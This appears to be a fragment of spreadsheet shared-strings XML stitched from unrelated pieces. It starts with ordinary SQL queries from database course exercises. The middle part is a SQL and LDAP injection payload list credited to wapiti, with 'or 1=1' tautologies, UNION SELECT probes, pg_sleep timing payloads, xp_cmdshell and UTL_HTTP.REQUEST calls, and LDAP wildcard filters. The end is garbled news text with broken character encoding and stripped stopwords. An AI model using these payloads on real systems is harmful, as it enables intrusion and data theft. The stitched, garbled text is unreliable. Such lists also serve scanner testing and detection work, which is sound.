    <t>select c.totpop, c.county from geod_counties c where mdsys.sdo_relate  (  c.geom, mdsys.sdo_geometry  ( 2003, 8307, null, mdsys.sdo_elem_info_array  ( 1,1003,3 ) , mdsys.sdo_ordinate_array  ( -109, 37, -102, 40  )  )  , 'mask = ANYINTERACT’ )   =  'TRUE'</t>
  </si>
  <si>
    <t>select count ( * )  from catasto where series  =  1</t>
  </si>
  <si>
    <t>select count ( * )  from departments d, courses c where d.name  =  'Computer Science' and d.id  =  c.department_id</t>
  </si>
  <si>
    <t>select count ( * )  from employee; select count ( * )  from employee,department where dno = dnumber and dname = 'Research';</t>
  </si>
  <si>
    <t>select count ( * )  from purchase;</t>
  </si>
  <si>
    <t>select count ( * ) , sex from catasto where series  =  1 group by sex</t>
  </si>
  <si>
    <t>select count ( * ) , trade, sex from catasto where series  =  1 and sex &lt;&gt; 0 group by trade, sex</t>
  </si>
  <si>
    <t>select count ( distinct product )  from purchase;</t>
  </si>
  <si>
    <t>select count ( distinct salary )  from employee;</t>
  </si>
  <si>
    <t>select count ( product )  from purchase;</t>
  </si>
  <si>
    <t>select count ( quantity )  from purchase;</t>
  </si>
  <si>
    <t>select county, c.state_abrv from geod_states s, geod_counties c where s.state  =  'New York' and mdsys.sdo_filter  ( c.geom, s.geom )   =  'TRUE'</t>
  </si>
  <si>
    <t>select d.name as "Department Name", count ( * )  as "# of Courses Offered" from departments d, courses c where d.id  =  c.department_id group by d.name</t>
  </si>
  <si>
    <t>select d.name from departments d inner join courses c on d.id  =  c.department_id where c.title  =  'Databases'</t>
  </si>
  <si>
    <t>select d.name from departments d, courses c where c.title  =  'Databases' and c.department_id  =  d.id</t>
  </si>
  <si>
    <t>select distinct C.cTitle, T.tYear, T.tMonth, T.tDay from trainingCourse C, takes T where C.cID = T.cID</t>
  </si>
  <si>
    <t xml:space="preserve">select distinct E.eID, E.eLast, E.eFirst, E.eTitle from  ( employee E natural join  ( takes T natural join dbCourse D  )  )  </t>
  </si>
  <si>
    <t>select distinct E.eID, E.eLast, E.eFirst, E.eTitle from employee E, takes T, dbCourse D where E.eID  =  T.eID and T.cID = D.cID</t>
  </si>
  <si>
    <t>select distinct E.eLast, E.eFirst, E.eTitle from employee E</t>
  </si>
  <si>
    <t>select distinct category from product;</t>
  </si>
  <si>
    <t>select distinct course_id from sections where year &lt; 2009</t>
  </si>
  <si>
    <t>select distinct essn from works_on where pno in  ( 1,2,3 ) ;</t>
  </si>
  <si>
    <t>select distinct f.name from faculty f inner join sections s on s.instructor_id  =  f.id inner join courses c on s.course_id  =  c.id where c.title  =  'Databases'</t>
  </si>
  <si>
    <t xml:space="preserve">select distinct f.name from faculty f where exists  ( select * from sections where year  =  2007 and instructor_id  =  f.id ) </t>
  </si>
  <si>
    <t>select distinct f.name from faculty f, courses c, sections s where c.title  =  'Databases' and c.id  =  s.course_id and s.instructor_id  =  f.id</t>
  </si>
  <si>
    <t>select distinct month from purchase;</t>
  </si>
  <si>
    <t xml:space="preserve">select distinct name from departments where id in  ( select department_id from courses where id in  ( select course_id from sections where year  =  2007  )  )  </t>
  </si>
  <si>
    <t>select distinct salary from employee;</t>
  </si>
  <si>
    <t>select distinct x.month,  ( select count ( * )  from purchase y where x.month = y.month and price &gt; 10.0 )  from purchase x where price &gt; 10.0;</t>
  </si>
  <si>
    <t>select distinct x.month,  ( select count ( * )  from purchase y where x.month = y.month and price &gt; 10.0 )  from purchase x;</t>
  </si>
  <si>
    <t>select distinct x.month,  ( select count ( * )  from purchase y where x.month = y.month )  from purchase x where price &gt; 10.0;</t>
  </si>
  <si>
    <t>select distinct x.month,  ( select count ( * )  from purchase y where x.month = y.month )  from purchase x;</t>
  </si>
  <si>
    <t>select distinct z.manufacturer,  ( select count ( * )  from Product x, Purchase y where z.manufacturer  =  x.manufacturer and x.pname  =  y.product )  from Product z;</t>
  </si>
  <si>
    <t>select dname,lname,fname,pname from department,employee,works_on,project where dnumber = dno and ssn = essn and pno = pnumber order by dname,lname,fname;</t>
  </si>
  <si>
    <t>select dno,count ( * ) ,avg ( salary )  from employee group by dno;</t>
  </si>
  <si>
    <t>select e.fname, e.lname from employee e where exists  ( select * from dependent where e.ssn  =  essn and e.fname  =  dependent_name and e.sex  =  sex ) ;</t>
  </si>
  <si>
    <t>select e.fname,e.lname from employee as e where e.ssn in  ( select essn from dependent where e.fname = dependent_name and e.sex = sex ) ;</t>
  </si>
  <si>
    <t>select e.fname,e.lname,s.fname,s.lname from employee as e, employee as s where e.superssn  =  s.ssn;</t>
  </si>
  <si>
    <t>select extract ( year from graduation_date )  as "Year", count ( * )  from students group by "Year"</t>
  </si>
  <si>
    <t>select extract ( year from graduation_date )  as "Year", count ( * )  from students group by "Year" having count ( * )  &gt; 2</t>
  </si>
  <si>
    <t xml:space="preserve">select extract ( year from graduation_date ) , count ( * )  from students group by extract ( year from graduation_date ) </t>
  </si>
  <si>
    <t xml:space="preserve">select f.name, count ( s.id )  from faculty f, sections s where f.id  =  s.instructor_id group by f.name having count ( s.id )  &gt; =   ( select count ( s.id )  from faculty f, sections s where f.id  =  s.instructor_id group by f.name limit 1 offset 2 ) </t>
  </si>
  <si>
    <t>select fname, lname from employee where not exists  (   ( select pnumber from project where dnum  =  5 )  MINUS  ( select pno from works_on where essn  =  ssn  )  )  ;</t>
  </si>
  <si>
    <t>select fname, lname from employee where ssn not in  ( select essn from dependent ) ;</t>
  </si>
  <si>
    <t>select fname,lname from employee where address like '%Houston, TX%'; select fname,lname,1.1*salary as increased_sal from employee,works_on,project where ssn = essn and pno = pnumber and pname = 'ProductX';</t>
  </si>
  <si>
    <t>select fname,lname from employee where exists  ( select * from department where ssn = mgrssn )  and exists  ( select * from dependent where ssn = essn ) ;</t>
  </si>
  <si>
    <t>select fname,lname from employee where not exists  ( select * from dependent where ssn = essn ) ;</t>
  </si>
  <si>
    <t>select fname,lname from employee where superssn is null;</t>
  </si>
  <si>
    <t>select fname,lname,address from employee,department where dnumber = dno and dname = 'Research';</t>
  </si>
  <si>
    <t>select lname,fname from employee where  ( select count ( * )  from dependent where ssn = essn )  &gt; = 2;</t>
  </si>
  <si>
    <t>select max ( quantity )  from purchase;</t>
  </si>
  <si>
    <t>select min ( E.eSalary )  from employee E</t>
  </si>
  <si>
    <t>select min ( graduation_date )  from students</t>
  </si>
  <si>
    <t>select min ( quantity )  from purchase;</t>
  </si>
  <si>
    <t>select month from purchase group by month;</t>
  </si>
  <si>
    <t>select month, count ( * )  from purchase group by month;</t>
  </si>
  <si>
    <t>select month, count ( * )  from purchase where price &gt; 10.0 group by month;</t>
  </si>
  <si>
    <t>select month, count ( * ) , sum ( price*quantity ) /count ( * )  from purchase group by month having sum ( price*quantity ) /count ( * )  &lt; 100.0;</t>
  </si>
  <si>
    <t>select month, sum ( price*quantity ) /count ( * )  as avgrev from purchase group by month order by avgrev desc;</t>
  </si>
  <si>
    <t>select name from ids left join tokens on ids.eid  =  tokens.eid where ids.typedef  =  true</t>
  </si>
  <si>
    <t>select name from students except select name from faculty</t>
  </si>
  <si>
    <t>select name from students intersect select name from faculty</t>
  </si>
  <si>
    <t>select name from students union select name from faculty</t>
  </si>
  <si>
    <t xml:space="preserve">select name from students where name in  ( select name from faculty ) </t>
  </si>
  <si>
    <t>select name from students where name like 'A%' order by name desc</t>
  </si>
  <si>
    <t xml:space="preserve">select name from students where name not in  ( select name from faculty ) </t>
  </si>
  <si>
    <t>select name, count ( * )  as c from tokens inner join ids on ids.eid  =  tokens.eid group by eid order by c desc</t>
  </si>
  <si>
    <t>select name, count ( * )  as cf from  (  select fid, tokens.eid, count ( * )  as c from tokens group by eid, fid )  as cl inner join ids on cl.eid  =  ids.eid group by ids.eid, ids.name order by cf desc;</t>
  </si>
  <si>
    <t>select name, patronymic, family_name, sex, total, bocche from catasto where family_name  =  “MACHIAVELL” order by patronymic</t>
  </si>
  <si>
    <t>select pnumber,dnum,lname,address,bdate from project,department,employee where dnum = dnumber and mgrssn = ssn and plocation = 'Stafford';</t>
  </si>
  <si>
    <t>select pnumber,pname,count ( * )  from project,works_on where pnumber = pno group by pnumber,pname having count ( * ) &gt;2;</t>
  </si>
  <si>
    <t>select pnumber,pname,count ( * )  from project,works_on where pnumber = pno group by pnumber,pname;</t>
  </si>
  <si>
    <t>select pnumber,pname,count ( * )  from project,works_on,employee where pnumber = pno and ssn = essn and dno = 5 group by pnumber,pname; select dnumber,count ( * )  from department,employee where dnumber = dno and salary&gt;40000 and dno in  ( select dno from employee group by dno having count ( * ) &gt;5 )  group by dnumber;</t>
  </si>
  <si>
    <t>select product, count ( * )  from purchase group by product;</t>
  </si>
  <si>
    <t>select product, count ( * )  from purchase where price &gt; 2.0 group by product;</t>
  </si>
  <si>
    <t>select product, max ( month )  from purchase group by product;</t>
  </si>
  <si>
    <t>select product, min ( month ) , max ( month )  from purchase group by product;</t>
  </si>
  <si>
    <t>select product, month from purchase group by product;</t>
  </si>
  <si>
    <t>select product, sum ( price*quantity )  as rev from purchase group by product order by rev desc;</t>
  </si>
  <si>
    <t>select product, sum ( price*quantity )  from purchase group by product;</t>
  </si>
  <si>
    <t>select product, sum ( price*quantity ) /count ( * )  from purchase group by product;</t>
  </si>
  <si>
    <t>select projects.name as projname, cufiles.name as cuname, basefiles.name as basename, definefiles.name as defname from definers inner join projects on definers.pid  =  projects.pid inner join files as cufiles on definers.cuid = cufiles.fid inner join files as basefiles on definers.basefileid = basefiles.fid inner join files as definefiles on definers.definerid  =  definefiles.fid;</t>
  </si>
  <si>
    <t>select s from  ( select name as s, foffset from ids inner join tokens on ids.eid  =  tokens.eid where fid  =  4 union select code as s, foffset from rest where fid  =  4 union select comment as s, foffset from comments where fid  =  4 union select string as s, foffset from strings where fid  =  4 )  order by foffset</t>
  </si>
  <si>
    <t>select s.name from students s left join faculty f on s.name  =  f.name where f.id is null</t>
  </si>
  <si>
    <t>select s.name from students s, faculty f where s.name  =  f.name</t>
  </si>
  <si>
    <t>select section_id, count ( student_id )  from enrollment group by section_id</t>
  </si>
  <si>
    <t>select section_id, count ( student_id )  from enrollment group by section_id order by count ( student_id )  desc limit 2</t>
  </si>
  <si>
    <t>select ssn from employee;</t>
  </si>
  <si>
    <t>select ssn,dname from employee,department;</t>
  </si>
  <si>
    <t>select sum ( quantity )  from purchase;</t>
  </si>
  <si>
    <t>select sum ( salary ) ,max ( salary ) ,min ( salary ) ,avg ( salary )  from employee</t>
  </si>
  <si>
    <t>select sum ( salary ) ,max ( salary ) ,min ( salary ) ,avg ( salary )  from employee, department where dno = dnumber and dname = 'Research';</t>
  </si>
  <si>
    <t>select task_name,command,attr5 from user_advisor_actions</t>
  </si>
  <si>
    <t>select x.manufacturer, count ( * )  from Product x, Purchase y where x.pname  =  y.product group by x.manufacturer;</t>
  </si>
  <si>
    <t>select x.manufacturer, count ( y.pid )  from Product x left outer join Purchase y on x.pname  =  y.product group by x.manufacturer;</t>
  </si>
  <si>
    <t>select x.manufacturer, y.month, count ( * )  from Product x, Purchase y where x.pname  =  y.product group by x.manufacturer, y.month;</t>
  </si>
  <si>
    <t>sqlsetcur dbms_sqltune.sqlset_cursor</t>
  </si>
  <si>
    <t>truncate table user_workload</t>
  </si>
  <si>
    <t xml:space="preserve">update employee set superior_emp_id  =   ( select emp_id from emp_tmp where lname  =  'Blake' and fname  =  'John' )  where   (  (  lname  =  'Mason' and fname  =  'Cindy' )  or  ( lname  =  'Portman' and fname  =  'Frank'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">update employee set superior_emp_id  =   ( select emp_id from emp_tmp where lname  =  'Fleming' and fname  =  'Helen' )  where   (  (  lname  =  'Tucker' and fname  =  'Chris' )  or  ( lname  =  'Parker' and fname  =  'Sarah' )  or  ( lname  =  'Grossman' and fname  =  'Jane'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">update employee set superior_emp_id  =   ( select emp_id from emp_tmp where lname  =  'Hawthorne' and fname  =  'Susan' )  where   (  (  lname  =  'Gooding' and fname  =  'John' )  or  ( lname  =  'Fleming' and fname  =  'Helen' )  or  ( lname  =  'Roberts' and fname  =  'Paula' )  or  ( lname  =  'Blake' and fname  =  'John' )  or  ( lname  =  'Markham' and fname  =  'Theresa'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">update employee set superior_emp_id  =   ( select emp_id from emp_tmp where lname  =  'Markham' and fname  =  'Theresa' )  where   (  (  lname  =  'Fowler' and fname  =  'Beth' )  or  ( lname  =  'Tulman' and fname  =  'Rick'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">update employee set superior_emp_id  =   ( select emp_id from emp_tmp where lname  =  'Roberts' and fname  =  'Paula' )  where   (  (  lname  =  'Ziegler' and fname  =  'Thomas' )  or  ( lname  =  'Jameson' and fname  =  'Samantha'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">update employee set superior_emp_id  =   ( select emp_id from emp_tmp where lname  =  'Smith' and fname  =  'Michael' )  where   (  (  lname  =  'Barker' and fname  =  'Susan' )  or  ( lname  =  'Tyler' and fname  =  'Robert'  )  )  </t>
  </si>
  <si>
    <t>update employee set superior_emp_id  =   ( select emp_id from emp_tmp where lname  =  'Tyler' and fname  =  'Robert' )  where lname  =  'Hawthorne' and fname  =  'Susan'</t>
  </si>
  <si>
    <t xml:space="preserve">update enrollment set grade_id  =   ( select id from grades where letter  =  'A-' )  where grade_id  =   ( select id from grades where letter  =  'B+' )  and section_id  =   ( select s.id from sections s, courses c where s.year  =  2001 and s.course_id  =  c.id and c.title  =  'Calculus' ) </t>
  </si>
  <si>
    <t>update faculty set name  =  'John', department_id  =  10 where id  =  5</t>
  </si>
  <si>
    <t>update purchase set price  =  null where price  =  'null';</t>
  </si>
  <si>
    <t>v_action number</t>
  </si>
  <si>
    <t xml:space="preserve">v_attr1 VARCHAR2 ( 4000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">v_attr2 VARCHAR2 ( 4000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">v_attr3 VARCHAR2 ( 4000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">v_attr4 VARCHAR2 ( 4000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">v_attr5 VARCHAR2 ( 4000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">v_command VARCHAR2 ( 32 ) </t>
  </si>
  <si>
    <t xml:space="preserve">variable name varchar2 ( 30 ) </t>
  </si>
  <si>
    <t>with agents ( name, salary )  as   (  (  select name, salary from fedemp where manager  =  'Hoover' )  union all  ( select f.name, f.salary from agents as a, fedemp as f where f.manager  =  a.name )   ) , innerjoin ( name, rank, subject, enrollment )  as  ( select t.name, t.rank, c.subject, c.enrollment from teachers as t, courses as c where t.name  =  c.teacher and c.quarter  =  'Fall 96' ) , teacher_only ( name, rank )  as  ( select name, rank from teachers except all select name, rank from innerjoin ) , course_only ( subject, enrollment )  as  ( select subject, enrollment from courses where quarter  =  'Fall 96' except all select subject, enrollment from innerjoin )  select name, rank, subject, enrollment from innerjoin union all select name, rank, cast ( null as varchar ( 20  )  )   as subject, cast ( null as integer )  as enrollment from teacher_only union all select cast ( null as varchar ( 20  )  )   as name, cast ( null as varchar ( 20  )  )   as rank, subject, enrollment from course_only</t>
  </si>
  <si>
    <t>#</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t xml:space="preserve"> --</t>
  </si>
  <si>
    <t>'%20--</t>
  </si>
  <si>
    <t>--';</t>
  </si>
  <si>
    <t>'%20;</t>
  </si>
  <si>
    <t>=%20'</t>
  </si>
  <si>
    <t>=%20;</t>
  </si>
  <si>
    <t>=%20--</t>
  </si>
  <si>
    <t>\x23</t>
  </si>
  <si>
    <t>\x27</t>
  </si>
  <si>
    <t>\x3D%20\x3B'</t>
  </si>
  <si>
    <t>\x3D%20\x27</t>
  </si>
  <si>
    <t>\x27\x4F\x52 SELECT *</t>
  </si>
  <si>
    <t>\x27\x6F\x72 SELECT *</t>
  </si>
  <si>
    <t>'or%20select *</t>
  </si>
  <si>
    <t>admin'--</t>
  </si>
  <si>
    <t>&lt;&gt;"'%;)(&amp;+</t>
  </si>
  <si>
    <t>'%20or%20''='</t>
  </si>
  <si>
    <t>'%20or%20'x'='x</t>
  </si>
  <si>
    <t>%20or%20x"="x</t>
  </si>
  <si>
    <t>')%20or%20('x'='x</t>
  </si>
  <si>
    <t>0 or 1=1</t>
  </si>
  <si>
    <t>' or 0=0 --</t>
  </si>
  <si>
    <t xml:space="preserve"> or 0=0 --_x000D_
or 0=0 --_x000D_
' or 0=0 #_x000D_
 or 0=0 #</t>
  </si>
  <si>
    <t>or 0=0 #</t>
  </si>
  <si>
    <t>' or 1=1--</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1=1--_x000D_
' or '1'='1'--_x000D_
' or 1 --'"</t>
  </si>
  <si>
    <t>or 1=1--</t>
  </si>
  <si>
    <t>or%201=1</t>
  </si>
  <si>
    <t>or%201=1 --</t>
  </si>
  <si>
    <t>' or 1=1 or ''='</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1=1 or "=</t>
  </si>
  <si>
    <t>' or a=a--</t>
  </si>
  <si>
    <t xml:space="preserve"> or a"="a</t>
  </si>
  <si>
    <t>') or ('a'='a</t>
  </si>
  <si>
    <t>) or (a"="a</t>
  </si>
  <si>
    <t>hi" or "a"="a</t>
  </si>
  <si>
    <t>hi" or 1=1 --</t>
  </si>
  <si>
    <t>hi' or 1=1 --</t>
  </si>
  <si>
    <t>hi' or 'a'='a</t>
  </si>
  <si>
    <t>hi') or ('a'='a</t>
  </si>
  <si>
    <t>hi") or ("a"="a</t>
  </si>
  <si>
    <t>'hi' or 'x'='x';</t>
  </si>
  <si>
    <t>@variable</t>
  </si>
  <si>
    <t>,@variable</t>
  </si>
  <si>
    <t>PRINT</t>
  </si>
  <si>
    <t>PRINT @@variable</t>
  </si>
  <si>
    <t>select</t>
  </si>
  <si>
    <t>insert</t>
  </si>
  <si>
    <t>as</t>
  </si>
  <si>
    <t>or</t>
  </si>
  <si>
    <t>procedure</t>
  </si>
  <si>
    <t>limit</t>
  </si>
  <si>
    <t>order by</t>
  </si>
  <si>
    <t>asc</t>
  </si>
  <si>
    <t>desc</t>
  </si>
  <si>
    <t>delete</t>
  </si>
  <si>
    <t>update</t>
  </si>
  <si>
    <t>distinct</t>
  </si>
  <si>
    <t>having</t>
  </si>
  <si>
    <t>truncate</t>
  </si>
  <si>
    <t>replace</t>
  </si>
  <si>
    <t>like</t>
  </si>
  <si>
    <t>handler</t>
  </si>
  <si>
    <t>bfilename</t>
  </si>
  <si>
    <t>' or username like '%</t>
  </si>
  <si>
    <t>' or uname like '%</t>
  </si>
  <si>
    <t>' or userid like '%</t>
  </si>
  <si>
    <t>' or uid like '%</t>
  </si>
  <si>
    <t>' or user like '%</t>
  </si>
  <si>
    <t>exec xp</t>
  </si>
  <si>
    <t>exec sp</t>
  </si>
  <si>
    <t>'; exec master..xp_cmdshell</t>
  </si>
  <si>
    <t>'; exec xp_regread</t>
  </si>
  <si>
    <t>t'exec master..xp_cmdshell 'nslookup www.google.com'--</t>
  </si>
  <si>
    <t>\x27UNION SELECT</t>
  </si>
  <si>
    <t>' UNION SELECT</t>
  </si>
  <si>
    <t>' UNION ALL SELECT</t>
  </si>
  <si>
    <t>' or (EXISTS)</t>
  </si>
  <si>
    <t>' (select top 1</t>
  </si>
  <si>
    <t>'||UTL_HTTP.REQUEST</t>
  </si>
  <si>
    <t>1;SELECT%20*</t>
  </si>
  <si>
    <t>to_timestamp_tz</t>
  </si>
  <si>
    <t>tz_offset</t>
  </si>
  <si>
    <t>&amp;lt;&amp;gt;&amp;quot;'%;)(&amp;amp;+</t>
  </si>
  <si>
    <t>'%20or%201=1</t>
  </si>
  <si>
    <t>%27%20or%201=1</t>
  </si>
  <si>
    <t>%20$(sleep%2050)</t>
  </si>
  <si>
    <t>%20'sleep%2050'</t>
  </si>
  <si>
    <t>char%4039%41%2b%40SELECT</t>
  </si>
  <si>
    <t>&amp;apos;%20OR</t>
  </si>
  <si>
    <t>'sqlattempt1</t>
  </si>
  <si>
    <t>(sqlattempt2)</t>
  </si>
  <si>
    <t>|</t>
  </si>
  <si>
    <t>%7C</t>
  </si>
  <si>
    <t>*|</t>
  </si>
  <si>
    <t>%2A%7C</t>
  </si>
  <si>
    <t>*(|(mail=*))</t>
  </si>
  <si>
    <t>%2A%28%7C%28mail%3D%2A%29%29</t>
  </si>
  <si>
    <t>*(|(objectclass=*))</t>
  </si>
  <si>
    <t>%2A%28%7C%28objectclass%3D%2A%29%29</t>
  </si>
  <si>
    <t>(</t>
  </si>
  <si>
    <t>)</t>
  </si>
  <si>
    <t>&amp;</t>
  </si>
  <si>
    <t>!</t>
  </si>
  <si>
    <t>' or ''='</t>
  </si>
  <si>
    <t>x' or 1=1 or 'x'='y</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>//</t>
  </si>
  <si>
    <t>//*</t>
  </si>
  <si>
    <t>*/*</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4860' )  as azyx where 6901 = 6901 union all select 6901,6901,6901,6901,6901#</t>
  </si>
  <si>
    <t>1 )  as clye where 7842 = 7842 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>"  )  )   or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>'  )  )   or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>' or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>' )  or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>1 )  or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t># from wapiti</t>
  </si>
  <si>
    <t>1 or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>1  )  )   or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>" )  or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>" or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> Howie also ordered pay costs Â£ 90 victim surcharge Â£ 100 </t>
  </si>
  <si>
    <t xml:space="preserve"> Mainz concerned regarding availability Nicolai MÃ¼ller </t>
  </si>
  <si>
    <t xml:space="preserve">  Add plain text â€œNe te quaesiveris extra</t>
  </si>
  <si>
    <t xml:space="preserve"> If malice vanity wear coat philanthropy, shall pass? If angry bigot assumes bountiful cause Abolition, comes last news Barbadoes, I say him, â€˜Go love thy infant; love thy wood-chopper: good-natured modest: grace; never varnish hard, uncharitable ambition incredible tenderness black folk thousand miles off</t>
  </si>
  <si>
    <t xml:space="preserve"> In case emergency , support provided KÃ¶nigsfeld daytime task force </t>
  </si>
  <si>
    <t xml:space="preserve"> Meanwhile , cosy magical alternative provided Hermann BÃ¼ttner </t>
  </si>
  <si>
    <t xml:space="preserve"> Anja Schlichter managed tournament The organisation tournament placed trusty hands Anja Schlichter , supported Carmen MÃ¼ller Inga Kronemeyer </t>
  </si>
  <si>
    <t>jpg /161-4065/ì¶”/8482/73 /i5W9va9aKuNwS0p1213dMXvxZSo3FQ =  =  /usr/lib/sendmail 0 001000000000000022 004000000000000011 004000000000000012 00:00 01 010 0101 0102 01024328836 01026253919 01052578483 01055251172 01055511178 01082117188 01087911493 0109 0124 02 04 05 06 07 08 09 1 1 1&amp; 1</t>
  </si>
  <si>
    <t xml:space="preserve"> The recent cause Rangnick &amp;apos;s criticism yellow card Mane 3: 0 GrÃ¶dig last Sunday , whereby Senegalese striker penalised supposed play acting - admittedly justified , shown TV footage </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Gechingen: Absolute protection possible &amp;quot; We want involve residents planning early stage possible , &amp;quot; said Mayor Jens HÃ¤uÃŸler , opening citizen &amp;apos;s information event regarding flood protection concept Gechingen </t>
  </si>
  <si>
    <t xml:space="preserve"> Even wood &amp;quot; Kuhbach &amp;quot; area occasionally transported via route , vehicles , measure 20 metres length , would able use route via HÃ¤berles Bridge , would able make turn Hauptstrasse </t>
  </si>
  <si>
    <t xml:space="preserve"> Harkam also played &amp;quot; part &amp;quot; escalation Salzburg Coach Roger Schmidt GrÃ¶dig Trainer Adi HÃ¼tter game </t>
  </si>
  <si>
    <t xml:space="preserve"> Newly promoted DÃ¼sseldorf Baskets 23 May submit documents arbitration panel prove financial fitness Bundesliga </t>
  </si>
  <si>
    <t xml:space="preserve"> Following recent meeting Snowden Moscow , German Green Party politician Hans-Christian StrÃ¶bele appealed USA continue threaten prosecution </t>
  </si>
  <si>
    <t xml:space="preserve"> TÃ¶niser StraÃŸe failed see 37-year-old &amp;apos;s oncoming vehicle </t>
  </si>
  <si>
    <t xml:space="preserve"> According Alexander Misok BrÃ¤unlingen Municipal Planning Building Control Authority , ongoing procedure plans involve Regional Memorial Authority planning stage draw renovation concept old wall </t>
  </si>
  <si>
    <t xml:space="preserve"> , 26-year-old man cycling illegally , left footpath Bahnhofplatz direction MarktstÃ¤tte , ladies bicycle </t>
  </si>
  <si>
    <t xml:space="preserve"> According information police , 41-year-old MÃ¼sch travelling car Kempener bypass direction Grefrath , around 9</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</si>
  <si>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íŠ¸ë¦¬ê±° L-840 450 íŠ¸ë¦¬ê±°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t>
  </si>
  <si>
    <t xml:space="preserve"> The municipality coffers Herdwangen-SchÃ¶nach well stocked administration debt-free since 2005 </t>
  </si>
  <si>
    <t xml:space="preserve"> â€” â€˜Ah, shall sure misunderstood</t>
  </si>
  <si>
    <t xml:space="preserve"> GÃ¶nningen found extremely difficult cope hard well-positioned offensive moves </t>
  </si>
  <si>
    <t xml:space="preserve"> In projections , supervisory council energy company even assumed levy higher reported JÃ¶rg-Arne Bias </t>
  </si>
  <si>
    <t xml:space="preserve"> Psaki emphasised StrÃ¶bele &amp;apos;s comments views parliamentarian , German government member </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We concerning wild card process certain DÃ¼sseldorf receiving licence , &amp;quot; said boss Neckar Riesen Alexander Reil , speaking paper </t>
  </si>
  <si>
    <t>7bn Â£ 42</t>
  </si>
  <si>
    <t>â€™ â€” Is bad, then, misunderstood? Pythagoras misunderstood, Socrates, Jesus, Luther, Copernicus, Galileo, Newton, every pure wise spirit ever took flesh</t>
  </si>
  <si>
    <t xml:space="preserve"> Zita KÃ¶hler , Chairperson Parish Council , agreed give talk Biblical proverbs breakfast </t>
  </si>
  <si>
    <t xml:space="preserve"> A stubborn ankle injury threatens prevent deployment Nicolai MÃ¼ller FSV Mainz &amp;apos;s Bundesliga away match FC Augsburg </t>
  </si>
  <si>
    <t xml:space="preserve"> The so-called &amp;apos; German Mass &amp;apos; , original title &amp;quot; GesÃ¤nge zur Feier des heiliges Opfers der Messe &amp;quot; (Songs celebrate holy sacrifice mass), D 872 , spiritual work composer Franz Schubert , dating 1826 , time written considered almost revolutionary </t>
  </si>
  <si>
    <t xml:space="preserve"> KÃ¶nigsfeld: Small team gives spirited performance The voluntary fire service bravely came main autumn test run spite lack personnel </t>
  </si>
  <si>
    <t xml:space="preserve"> At awards ceremony , Carmen MÃ¼ller finally pleasure presenting Challenge Cup Andre Maier Matthias Bronner , shown greatest staying power final leg </t>
  </si>
  <si>
    <t xml:space="preserve"> The period word â€œmenuâ€ predicted parsing adverbial clause modifier (advcl) completed</t>
  </si>
  <si>
    <t xml:space="preserve"> Fifth place went Artur BrÃ¼ckner , responsible organising music copies </t>
  </si>
  <si>
    <t xml:space="preserve"> The complete background report found &amp;quot; AllgÃ¤uer Anzeigeblatt &amp;quot; newspaper dated 31 / 10 / 2013 (page 33)</t>
  </si>
  <si>
    <t xml:space="preserve"> ë‚œ ë©‹ìžˆë‹¤</t>
  </si>
  <si>
    <t xml:space="preserve"> Tax foreign property owners burst London &amp;apos;s bubble The Treasury provisionally costed CGT measure awaiting final decision Mr Osborne , , 2012 Budget , introduced 7% rate stamp duty homes costing Â£ 2m annual charges buyers choose hold homes company rather individuals </t>
  </si>
  <si>
    <t xml:space="preserve"> The FDP spokesperson social youth-related affairs , Fritz RÃ¶hrenbeck wants dig deeper </t>
  </si>
  <si>
    <t xml:space="preserve"> Konstanz: Road block following accident SchÃ¤nzle roundabout According police , accident occurred 51-year-old driver Swiss Seat Ibiza travelling town left lane two-lane Reichenaustrasse </t>
  </si>
  <si>
    <t xml:space="preserve"> The reconstruction railway crossing Trautwein tannery could , hand , bring entirely different problem regard access steep &amp;quot; GeroltzhÃ¤user Weg &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Without possibility domestic currency devaluation , southern Europe finds built-in productivity disadvantage vis-Ã -vis Germany </t>
  </si>
  <si>
    <t xml:space="preserve"> GrieÃŸhaber therefore suggested required supporting wall constructed way town could due course widen adjoining street order guarantee smooth flow traffic </t>
  </si>
  <si>
    <t>â€ Epilogue Beaumont Fletcherâ€™s Honest Manâ€™s Fortune Cast bantling rocks, Suckle she-wolfâ€™s teat; Wintered hawk fox, Power speed hands feet</t>
  </si>
  <si>
    <t xml:space="preserve"> On saying, What I sacredness traditions, I live wholly within? friend suggested, â€” â€œBut impulses may below, above</t>
  </si>
  <si>
    <t xml:space="preserve"> A character like acrostic Alexandrian stanza; â€” read forward, backward, across, still spells thing</t>
  </si>
  <si>
